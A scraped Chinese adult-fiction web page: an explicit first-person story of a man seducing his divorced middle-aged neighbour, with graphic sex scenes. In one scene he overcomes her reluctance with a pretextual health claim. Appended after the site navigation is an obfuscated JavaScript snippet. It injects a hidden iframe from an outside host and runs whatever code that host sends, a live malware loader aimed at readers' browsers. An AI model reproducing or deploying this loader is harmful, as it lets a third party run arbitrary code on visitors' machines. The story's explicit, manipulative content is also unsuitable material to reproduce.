字幕網- 每日更新 永久免費

【我和絲襪女鄰居的激情】
【完】


?????? 我叫吳庸剛,今年28歲,身高 1米82曾經是大學籃球校隊主力,相貌英俊,身材健美。畢業後回到小城市的家鄉機關單位工作。

  由於沒結婚一直在單位的宿舍住,後來因為單位宿舍裝修,我在城裏的城關新村租了一棟平房住著。沒想到這竟然成了豔遇的開始。

  2008年6月的一天,早晨像往常一樣7點半準時出門上班,剛出門突然眼前一亮,看見一個高挑豔麗的三十五、六 歲美婦從我家前麵的胡同拐了出來,穿著高跟鞋身高能有1米73,燙一頭稍帶紅色的披肩卷發,穿一身淡藍色的連衣裙,乳房高高的聳起,臉上的妝化的非常精致,腿上穿著亮白的肉色絲襪,腳上穿一雙全透明的水晶細高跟鞋。

  當時我的心就突突的跳了起來,心想:「媽的,真是個尤物,真知道男人喜歡什幺。」當時我在她的後麵幾米遠,我快步走到她身邊又仔細的看了那美婦一眼,一陣芬香的香水味撲鼻而來,我情不自禁的深吸一口氣,仔細的打量了一下,這下更令我心跳不已,我是非常喜歡女人腳的,俗話說:女人七分頭,三分腳。那美婦的塗著紅色指甲油的嫩白的腳趾頭圓滾滾肉乎乎的,非常整齊和勻稱。當時我心想真他媽的適合我的口味。能親親她的小腳我也高興。這是那中年美婦覺察我正看她,也偏頭看我,正好我們目光相接,她也被我這高大英俊的相貌吸引,深深的看了我一眼,眉間不經意流露出一股媚態。根據我多年看美女的經驗,肯定一個慾壑難填的騷婦。

  當時我也不好意思再看人家,隻好低下頭匆匆的走過上班去了,整一天也沒心思工作,心裏老想著這個美婦。想著怎幺能把她弄到手。

  下班回家後趕緊假意去找房東大媽聊天,裝作不經意的提起那個中年美婦,原來那美婦今年已經40歲了,在市文化館上班,原來是個舞蹈教師,怪不得身材保持的那幺好。年輕時候聽說是因為作風問題跟男人離婚了,一個女兒今年18,在外地上班,家裏就她自己一個人。她自己沒事經常去舞廳跳舞,而且經常又不明身份的男人出入她家,我當時一聽心裏樂開了花,覺得這中年美婦能弄到手。

  事有湊巧,天公作美,幾天後是一個星期三晚上,我在外麵喝完酒後沒讓同事開車送,自己步行往家走,快到家時又看見那中年美婦,正自己香汗淋漓吃力的推著一輛紫紅色的踏板摩托車,我趕忙上去打招呼:「大姐你好,怎幺了?」那美婦一怔,我趕緊自我介紹:「我是你鄰居,就住你家後麵那某某家。」那美婦也認出了我,說:「摩托車壞了,好像是沒油了。」我打開油箱看了看,確實沒油了。這英雄救美人的好機會我哪能放過。自告奮勇的說:「大姐,我幫你推吧。」那美婦一開始不太好意思,不過確實力乏了,也就沒在堅持。在一路上我們聊著天,原來那美婦姓趙,叫趙美妍,非常好聽的名字。

  我為了套近乎說:「我們是鄰居,有什幺重活喊我一聲就行。甭客氣。以後我就叫你妍姐了,你叫我小吳也行,剛弟也行」,妍姐非常感激的說:「那……我以後叫你剛弟吧」。我們一路上聊著天不一會我幫她把摩托車推到了家,6月天氣比較熱,我也累出了一身汗。我假裝告辭要走,其實心裏非常的想進去看看她家什幺樣。

  這時妍姐非常的不好意思挽留我:「你別走啊,瞧你累的一身汗,進來洗把臉喝口水再走吧。今天可真是太謝謝你了,沒有你我真不知道怎幺弄回來呢。」我一聽這話,正中下懷,假意推辭了下就跟著進去了。她家也是四間平房,院子非常乾淨,正中的兩大間是客廳,布置的非常溫馨,裝飾的也狠典雅,一組寬大的布藝沙發擺在中間。一股她身上的香水味道彌漫在空氣中,我情不自禁的又深吸了一口。

  妍姐說:「你先去衛生間洗把臉,我給你泡茶。」我進了衛生間,沒想到衛生間裏竟然掛著一條T型內褲和一條粉白色半透明的內褲,還有兩雙長筒絲襪。當時我的雞巴就直了。雖然我有過不少操屄的經驗,但是我對中年美婦的免疫力是零。我直覺的當時血往頭上湧,敢肯定臉都紅了。

  我關上門,把兩條內褲拿下來湊在鼻子前使勁聞,一股洗衣粉的清香味和略帶成熟女人的屄味撲鼻而來。我一邊聞一邊情不自禁的拉開褲鏈掏出雞巴把妍姐的絲襪套在龜頭上使勁套弄著。

  弄了一會我害怕讓妍姐發現。趕緊使勁聞了兩下趕緊放回原處匆匆洗了把臉提上褲子回到客廳。這時妍姐已經把茶泡好了,對我說:「你先坐下,我換件衣服,出了一身的汗」。然後衝我風情萬種的笑一下進去了裏屋。我一邊喝著茶,一邊聽裏麵悉悉索索的換衣服聲,我費了好大的勁才克製住了自己的雙腿沒站起來偷窺。

  一會妍姐出來了,我一看眼珠子都快掉出來了,下麵的大雞巴又硬了起來。

  她穿了一件長真絲睡衣,狠明顯沒戴乳罩,乳房高聳著,胸前有兩個凸起的圓點。

  下麵露出半截粉白的小腿,皮膚看上去非常光滑,染著紅色指甲油的嫩白小腳穿在紅色高跟拖鞋裏麵,我差一點就跪下去親吻她的腳了。

  妍姐過來在我身邊坐下,睡衣角滑落下來,露出一條大腿的半截,我偷眼瞅了下她兩腿中間,裏麵黑乎乎的好像是穿了內褲,又好像沒穿內褲。看到我垂涎三尺的樣子,妍姐風情的甩了甩頭發,老道的輕輕微笑了一下,我知道她在笑我垂涎欲滴的模樣。

  我恨恨的想:「媽的,以為我是雛啊。等有機會我非幹死你」當時就想撲上去,可是想歸想可害怕別自己領錯意思表錯情,還是沒敢動手。我羨慕道:「妍姐,你皮膚保養的可真好啊。真白」妍姐歎了口氣:「唉,現在老了,趕不上年輕時候了,離婚後,女兒現在又工作了,工資全花在美容上了。」我們又聊了一會逐漸的沒什幺話了,我說:「妍姐,給我講個笑話吧,今晚剛聽他們說的,笑死我了。」於是我就把晚上剛從酒桌上聽到的笑話講給她聽:

  「三個婦人談丈夫的性能力。甲說:唉,我那位像收電費的,一月來一次。乙說:

  我老公像送傳單的,隨便一塞便了事。丙聽了好一會才幽幽的說:你們還好呢,我那口子像送牛奶的,放在門口就走了。」妍姐聽了咯咯的笑,一邊笑一邊用小手捶我:「你個小東西可真壞。」隨著她的動作她那胸前那倆奶子也波濤起伏,看的我大流口水。等她笑夠了,我下麵也硬的受不了了,便趕緊起身告辭。妍姐出來送我,到門口妍姐羞澀的對我說:

  「剛弟,那個……」

  我問:「有什幺事嗎?」妍姐說:「這個周六我過生日,就我自己在家沒意思,我能不能請你吃頓飯啊,正好感謝感謝你。」我一聽求之不得啊,趕緊答應:

  「好啊,我一定來,等你做幾個菜我們在家過,在家才有氣氛幺。」妍姐聽了高興的回去了。

  我回到家,在床上製定了一個計劃,又趕緊起來按計劃上網定了點神秘的東西(至於是什幺東西以後自有分曉)才一邊想像著妍姐熟透的身體一邊沉睡過去。

  終於熬到了星期六,上午10點半我捧著一大束鮮花,提著蛋糕和包裝好的神秘禮物敲開了妍姐家的門,妍姐一開門我就把鮮花擋在她麵前說:「祝姐姐生日快樂!!」妍姐像個女孩似的歡呼一聲把花接了過去,看來女人愛花真是亙古不變的真理。

  她連聲說:「謝謝,謝謝你啊,好久沒人給我送花了呢」。

  妍姐今天打扮的非常性感,比那天晚上更大膽了,臉上依舊畫著精致的妝,把披肩卷發向後紮起一個馬尾,非常青春亮麗。穿著一件半透明的鵝黃色連衣裙。

  高聳的乳房根本就沒戴乳罩,倆個粉紅色的乳頭依稀的凸現出來。下麵一條黑色T字內褲清晰的顯現。粉白的腿穿著肉色絲襪,腳上穿的一雙紅色高跟拖鞋。

  這下我心裏更有底了,她今天穿的這幺薄和色差這幺明顯的內褲擺明了是要勾引我。我們來到院子裏,我把包裝好的神秘禮物送給她,一邊緊張的觀察著妍姐的表情。

  妍姐邊拆著包裝邊說:「弟弟你太客氣了,還送什幺禮物啊。」結果把東西一拿出來抖開一看臉馬上變得緋紅,這神秘禮物是我在網上訂的兩件情趣內衣,一件是白色的帶蕾絲花邊的乳罩,不過中間是空的,整個奶子正好能從中間露出來。一件是白色蕾絲帶花邊的分檔T字內褲,整個陰戶也是能從中間露出來。

  我早就想好了,如果妍姐翻臉的話我就說是給別人的禮物我給拿錯了,如果沒事就說明大功告成,好夢成真,結果妍姐並沒翻臉,隻是臉紅紅的風騷的看了我一眼,這下我終於繃不住了,一把把妍姐攬進懷裏,低頭就吻她性感柔軟的小嘴。

  開始妍姐唔唔的還掙紮了幾下,等我的舌頭撬開她的小嘴後徹底放棄了抵抗,反而用她柔軟帶著香氣的小舌頭瘋狂的尋找我的舌頭。一找到後接著又調皮的縮回去了,而我的舌頭馬上跟進伸進她的嘴裏,我們倆的舌頭使勁的攪動著,互相吮吸著對方的嘴唇。吞咽著對方嘴裏的汁液。

  我們倆一邊熱烈的親吻著一邊摩挲著對方的身體。我用手撩起她的裙子掀到胸部,終於抓住了妍姐的大奶子,她的奶子非常軟而且圓,像是倒扣的半個皮球,手感非常舒服,我使勁的揉捏著妍姐的乳房,一下一下的夾著她的奶頭。

  妍姐被我逗弄的全身癱軟,嘴又被我堵住,隻能低聲哼哼。妍姐拉開我的褲子,我那又長又粗的早已經在內褲裏脹的難受的大雞巴氣勢洶洶的跳了出來。妍姐吃驚的說:「呀,弟弟,你的雞巴好大啊,姐姐太喜歡了」說著抓住我的雞巴套弄起來。

  我放開了她的奶子,向下滑去,劃過她平坦的小腹,又滑過飽滿的陰阜和稀疏的陰毛伸向了她的兩腿中間,終於摸到了她多汁的蜜穴,那裏早已經是蜜汁橫流,洪水泛濫了,我把她兩片陰唇分開,將中指探進她的陰道,好緊的蜜穴啊,我的指頭都能感覺到蜜穴夾緊的力度。

  妍姐跟過電似的「嗯」的一聲全身顫了一下,把我的大雞巴握的更緊了,我一邊把中指探進去抽插著,一邊用拇指蘸了點蜜汁輕輕推開她陰蒂的包皮按住了她的陰蒂開始揉搓。妍姐哪能受了這個刺激,小嘴放開我的嘴大口的喘著粗氣,嘴裏嗯……嗯……的呻吟著。她一邊呻吟,一邊使勁的把蜜穴向前挺,想要讓我的指頭更進去一些。雙手撕扯著我的衣服把我扒光。

  我也飛快的扒光她的衣服,隻剩下透明的絲襪和腳上的紅色高跟拖鞋。這時我們倆人還站在院子裏呢,妍姐拉著我悄聲的對我說:「寶貝,我屄裏麵好癢,我們上床上去,別讓鄰居聽見。」我拉住她:「不嘛,姐姐,我就要在院子裏幹你。」她當時已經被慾火焚身了,隻隻希望能有個大雞巴塞進她的蜜穴給她止癢,終於也顧不得那些再也忍不住了,她著急的用一隻手攬住我的腰,一隻手扶正我的雞巴,分開兩腿把屁股向前一挺,嘴裏低聲的夾雜著痛苦和歡樂的歡叫把我的大龜頭吃進了她滾熱濕潤的蜜穴。妍姐身材非常高挑,又站在小台階上,我的大肉棒正好對著她的蜜穴,所以我不用彎腿也能非常舒服的抽插。

  但是由於我們兩個雙腿的阻擋,我隻能進去一個大龜頭。就這樣妍姐也有點受不了,她籲了一口氣,輕皺著眉頭說「弟弟,姐姐好久沒做愛了,再說你的雞巴太粗了,姐姐有點受不了。你開始輕點幹我」妍姐可能由於離婚早做愛比較少的緣故,她的蜜穴非常緊,把我的龜頭一握一握的非常刺激。我開始也不敢幹的太很,用一隻手攬住她纖細的水蛇腰,一隻手握著她的大奶子,嘴裏噙著妍姐的小舌頭,溫柔的抽插,盡量讓她占主動。

  我們用這個姿勢幹了五十多下,妍姐的蜜穴已經能適應我的大肉棒了,妍姐又用雙手環住我的脖子,用一隻腿站著,把另一隻腿纏上了我的腰,妍姐以前是跳舞的,腰腿都非常軟,這個姿勢就像是跳探戈舞一樣。這下我的大肉棒能插進去一半,妍姐一邊聳動著屁股,一邊嘴裏呻吟著:「嗯……嗯……弟弟,真舒服,嗯……你的雞巴太粗了,嗯……」我一邊幹她一邊回應道:「姐姐,你的屄真緊,我真想操在裏麵永遠不拔出來。」「嗯……弟弟,你永遠插在姐姐的屄裏麵吧,姐姐天天夾著它,嗯……姐姐的屄讓你操個夠。嗯啊……姐姐好舒服」我們一邊調情,一邊下麵撲哧撲哧的幹著。我們用這個姿勢幹了十幾分鍾,妍姐累了,把腿放了下來說:「弟弟,這個姿勢太累人了,站直了,抱著我的屁股,我要上去幹你」說著,雙手抱著我的脖子一使勁向上一縱,雙腿纏住了我的腰,我的大肉棒也噗嗤的一下全部塞進了妍姐的陰道,把妍姐操的「嚶嚀」一聲伏在了我的肩上連連的嬌喘。「哎呀,弟弟,你的雞巴太長了,都幹到姐姐的屄心了。嗯……真舒服,嗯……」我用雙臂夾住妍姐穿著絲襪的美腿,雙手抱住她粉嫩的屁股,先靜靜的享受了會她濕熱緊窄的美穴,開始慢慢的幹她,幹了一會妍姐的高潮就上來了,騎在我的肉棒上不停的瘋狂扭動著,那嬌美的臉龐上布滿了興奮的紅暈,一雙美眼緊緊的閉著,她一口咬住我的肩膀:「嗯……嗯……弟弟……寶貝……使勁……啊……使勁操我,使勁操我,姐姐屄裏麵好癢……把我的屄操爛了吧……使勁……啊……啊……幹的姐姐好美啊。」我一邊舔著她的耳垂,一邊加快了肉棒在她美穴裏麵抽動的頻率,她的屁股和我的大腿發出急促的啪啪聲,終於妍姐在使勁的聳動了幾下屁股後,蜜穴裏麵開始一陣一陣強力的抽搐,夾得我的肉棒行進都有點困難,蜜穴深處一股滾燙的陰精澆在我的龜頭上,燙的我的龜頭麻癢癢的。她人也癱軟的伏在了我的肩上。我放慢了動作,笑咪咪的問妍姐:「妍姐,這下爽了吧」「你個壞東西,幹死姐姐了」「還沒完呢,弟弟還沒舒服呢」我說著又加快了肉棒在她蜜穴裏抽插的頻率,妍姐渾身癱軟被幹的隻能嗯……嗯……的低哼著,這時妍姐高潮時射的陰精混合和著分泌的蜜汁被我的肉棒從陰道裏麵帶了出來流在我腿上,我用指頭揩了些放在嘴裏咂著,味道有些鹹鹹的,還有股淡淡的腥味,非常好吃。

  妍姐好奇的問:「寶貝,什幺味道啊?」我又揩了一些放進嘴裏說:「你嚐嚐就知道了。」說著把舌頭伸進她嘴裏,我們的舌頭又攪在一起,瘋狂的吮吸著陰精和蜜汁,吃完了妍姐還伸出小舌頭還要著吃,我們一邊做愛,一邊吃著雞巴和陰道交合處流出來的蜜汁,這個場景非常刺激。

  不一會妍姐又開始粉麵發紅,呼吸急促起來,用手端起一隻奶子向我嘴裏塞「寶貝,吸我的奶奶……」我先含了會她的乳頭,然後張大嘴使勁一吸,她的半個奶子都滑進我的嘴裏。我用舌頭使勁攪動著她的乳頭,吃完了這隻妍姐又馬上端起另一隻塞進我嘴裏。

  刺激的妍姐大喊:

  「弟弟,寶貝,姐姐又來了……啊……使勁弟弟……嗯……幹我……快點幹我啊……我又上來了……啊……啊。……使勁吃我的奶奶。」我也開始感覺雞巴麻癢癢的要忍不住了:「姐姐,使勁夾我,夾……」妍姐不愧是經驗豐富的熟婦,蜜穴的功夫也狠精熟,感覺陰道裏麵一夾一吸的,刺激的我雙手抱住她的屁股腰部大開大合加速貫刺著妍姐的蜜穴,蜜穴中的嫩肉不住的帶進帶出。

  難以承受那股通體快感的妍姐,向前張開小嘴渴望著我的疼愛,我也的迅速吻住她的唇瓣,將舌頭深入她的嘴裏吮吸著那甜美的唾液。幹的妍姐浪語連聲:

  「寶貝……啊……操死我吧……幹我……嗯……嗯……操死我……」我又使勁的操了她幾下,再也忍不住了肉棒那越來越強烈的快感,把肉棒很命的插進她的蜜穴深處把一股一股的滾燙精液射進她的花心。妍姐在滾燙的精液刺激下大叫一聲同時到了高潮,我們兩個死命的把陰部抵在一起渾身顫抖著向對方噴射著陰精。

  半響妍姐才蘇醒過來,笑眯眯的嗔怪道:「就怪你個小壞蛋,瞧弄的我一身汗,罰你給我洗澡……」我笑著說:「妍姐,給你洗澡可以,不過今天你可什幺事都聽我的安排。」「你個壞蛋又想什幺鬼花招,好啦,姐姐今天就什幺都聽你的。」「一言為定」我高興的抱著妍姐進了浴室。我擰開水龍頭把浴盆放滿水,彎腰輕輕的把妍姐放了進去,我的雞巴也「啵」的一聲從妍姐的陰道滑了出來,妍姐輕輕的發出一聲空虛的歎息。我跟著也進了浴缸,妍姐狠愛洗澡,她家的浴缸也狠大,能容下我們倆人側身躺下,我們倆一邊親吻著一邊摩挲著對方的身體。泡了一會我的大肉棒在溫暖的水和妍姐的小手的刺激下又抬起頭來。

  妍姐驚訝道:「呀,弟弟,你的家夥還沒吃飽啊?你可真厲害」「有姐姐那幺好吃的東西我的家夥怎幺吃也吃不夠啊。」說著我開始向妍姐身上塗抹著沐浴液開始為她洗澡,洗完全身後又特別在她的陰阜和陰道口塗了狠多泡泡,然後把我的大肉棒也塗上泡泡,讓妍姐背對著我把腰彎下,妍姐狠奇怪:「你要幹什幺呀?」我說:「剛才我們做愛時候你屄裏麵又是蜜汁,又是陰精又是精液的,髒的狠,我用肉棒當刷子給你把裏麵刷乾淨。」說著把我的雞巴插進了妍姐的陰道抽插了幾下拔了出來,然後把一根軟管一頭接在水龍頭上,一頭插進妍姐的陰道開始向裏麵注水要給她把裏麵的沐浴液衝洗出來,不一會妍姐喊:「弟弟,脹的疼。」我趕緊把軟管從陰道裏麵拔出來,隻見妍姐陰道裏麵的水象噴泉一樣的噴了出來。妍姐從來沒想到陰道還能當噴泉,樂的咯咯直笑。我又開始用手指撫弄著妍姐的肛門,「妍姐,我給你把腸道也清洗一下吧?」妍姐的肛門從來沒被開發過,所以狠羞澀:「別動那裏啊。」「沒事的妍姐,書上說腸道裏麵有狠多毒素,人家外國現在都流行清洗腸道美容呢。」妍姐一直注重保養,也可能是聽說過清洗腸道能美容的事情,所以就沒再拒絕隻是問:「那疼不疼啊?」我輕輕的扣挖著她的肛門柔聲說:「放鬆,姐姐,放鬆一點都不疼,真的。」妍姐的肛門狠軟,而且不是狠緊,我一邊安撫著她一邊輕輕的把管子插進了她的肛門,又稍擰開水龍頭向裏麵灌水。

  不一會妍姐喊:「弟弟,肚子脹……」我趕緊關了水龍頭把她扶到馬桶坐下,妍姐一坐下,她肚子裏麵的水和著髒東西噴薄而出。如此這樣洗了三次,我看著她肚子裏麵的髒東西都差不多乾淨了說:「姐姐,再洗最後一次就乾淨了。」我先把管子插進她的陰道,注滿水後讓妍姐捏住她的小陰唇堵住陰道別讓水留出來,然後把管子插進她的肛門,一會狠明顯的能看到妍姐的小腹鼓了起來。

  妍姐叫喊道:「脹得疼,弟弟。」我趕緊拔出軟管,命令妍姐夾緊肛門別讓水流出來。然後彎腰把妍姐像大人抱小孩子撒尿一樣抱起,對著馬桶說:「鬆手吧妍姐。」妍姐一鬆手,真是奇觀啊,兩道白亮的水柱從妍姐的肛門和陰道裏麵噴射出來。妍姐雖然閱曆不少,但是這樣的遊戲還是第一次玩,羞的滿臉通紅,反手抓住我的雞巴揉捏著說:「你個小東西可真壞!」把妍姐身體裏麵清理乾淨後我又拿出一把刮胡刀,說:「妍姐,你屄上的毛黑黑的,我不喜歡。我給你剃了。」讓她坐在馬桶蓋上把腿叉開仔細的把她的陰毛都給剃乾淨。完後我看妍姐的大陰唇還是挺白的,可是小陰唇由於多年性交的緣故有點發黑,我找到妍姐的粉餅,把她大陰唇仔細的撲上粉,又找到一管粉紅色的口紅,把她的小陰唇輕輕的抹上一層,這樣妍姐的陰戶看著跟少女的一樣白亮粉紅。

  我把我帶來的情趣內衣給妍姐穿上,白亮的奶子和陰戶從內衣中間露出來真是誘人。我又給妍姐穿上白亮的肉色絲襪,把我第一次看見她時她穿的透明的高跟鞋拿來給她穿上,妍姐雖然閱曆不少,但是從未這樣玩過,羞紅著臉一言不發任我折騰。看我終於弄完了撒嬌道:「弄完了沒有啊弟弟,姐姐都餓了。」我拉起她:「好了,我們吃飯去。」妍姐跟著我一扭一扭的走著,白亮的奶子和陰戶露在情趣內衣的外麵也跟著一扭一扭非常的淫蕩,我們進了餐廳坐下,妍姐弄了幾個清淡的小菜,我打開一瓶幹紅,倒了兩杯端起來:「祝姐姐生日快樂,永遠年輕,永遠漂亮。」妍姐象女孩一樣嘟起小嘴:「不嘛,人家要你喂我。」說著轉過來,麵對著我跨坐在我腿上,用小手把我的大雞巴扶正,對準蜜穴撲哧一聲坐了下去。

  我笑著喝了一口酒含著,妍姐把她的小嘴湊我的嘴上,我慢慢的一口一口的把酒喂給她,喝完了她還不夠,把小舌頭伸進我的嘴裏使勁的攪,使勁的吮吸著酒的汁液。我又夾了筷子菜用牙咬著一半也用嘴喂給她,妍姐把嘴向前一湊我把嘴向後一縮沒咬著,妍姐假裝生氣在我身上顛了兩下:「小壞蛋,再不給我吃我幹死你。」就這樣我們倆嘴對著嘴,我的雞巴插在她的蜜穴裏吃完了這頓美妙的午餐。

  吃完飯我們倆也都已經喝的差不多了,我才記起有蛋糕還沒吃,把蛋糕拿到桌子上,點上蠟燭妍姐許了願後我們開始吃蛋糕,我把奶油抹在妍姐的奶子上,象小孩子吃冰激淩一樣舔吃著她的奶頭,一邊還輕輕的晃動著妍姐的屁股,讓我的大肉棒在裏麵研磨她的蜜穴。不一會妍姐麵色發紅,呼吸急促,急急的說:

  「弟弟,我們到床上去,姐姐讓你好好享受享受。」我把著妍姐的屁股,大雞巴仍舊插在她的蜜穴裏把她抱進了臥室。剛把她放在床邊,妍姐就勢蹲下,捧起我的肉棒,張開小嘴含了進去,我的肉棒已經在她的蜜穴裏泡了大半個小時,更是青筋突起,變的更粗更長,妍姐的小嘴剛剛能塞進去。

  妍姐的口交經驗狠豐富,根本不是年輕女人比得上的。她的小舌頭一會磨著我的龜頭,一會用舌尖挑著我的馬眼,一會又吐出來用舌頭舔著我的肉棒,或又吃進去瘋狂的吞吐,又用力的吸我的肉棒,像要把我的精液給吸出來一樣。

  刺激的我的大雞巴直跳。我突然想起來,去廚房把蛋糕拿了過來,刮了些白色奶油把我的肉棒全部抹上,像一根大號的奶油雪糕,妍姐舔的更加起勁了,一邊吃著一邊還咂著嘴,弄我的也受不了,抱起妍姐放到床上,把她的蜜穴抹上奶油,用69式躺著,她趴在我身上吃著我的奶油肉棒,把她的奶油蜜穴對著我的嘴,她的蜜穴早已經是蜜汁泛濫了。

  我開始用舌頭舔吃著她蜜穴外麵混合著蜜汁的奶油,蜜汁混合著奶油味道非常不錯,我又用手掰開她的蜜穴把她的陰蒂抹上奶油嘬她的陰蒂,這下刺激的妍姐更受不了了,由於嘴被我的大肉棒給塞滿了,隻能發出唔唔的聲音,也更加瘋狂的舔吃著我的肉棒,蜜汁也更加洶湧了……



【完】



字節數:16988[ 此帖被zhouj614在2015-11-05 21:50重新編輯 ]

上一篇:Sena Nagakura永倉せな_[58P] 下一篇:【?性奴妹妹】【完】
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};